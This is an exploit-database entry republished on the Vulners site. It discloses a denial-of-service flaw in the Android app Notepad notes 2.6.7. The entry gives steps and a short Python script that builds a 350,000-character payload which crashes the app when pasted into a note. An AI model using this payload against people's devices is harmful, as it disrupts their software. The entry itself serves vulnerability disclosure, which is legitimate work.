Vulners
Lucene search
Notepad notes 2.6.7 - Denial of Service (PoC)
# Exploit Title: Notepad notes 2.6.7 - Denial of Service (PoC)
# Date: 2021-06-02
# Author: Brian Rodríguez
# Download Link: https://play.google.com/store/apps/details?id=com.hlcsdev.x.notepad&hl=es_MX
# Version: 2.6.7
# Category: DoS (Android)
##### Vulnerability #####
Bloc de notas is vulnerable to a DoS condition when a long lists of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause application to stop working.
I have been able to test this exploit against Android 8.0.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jun 2021 00:00Current
7.4High risk
Vulners AI Score7.4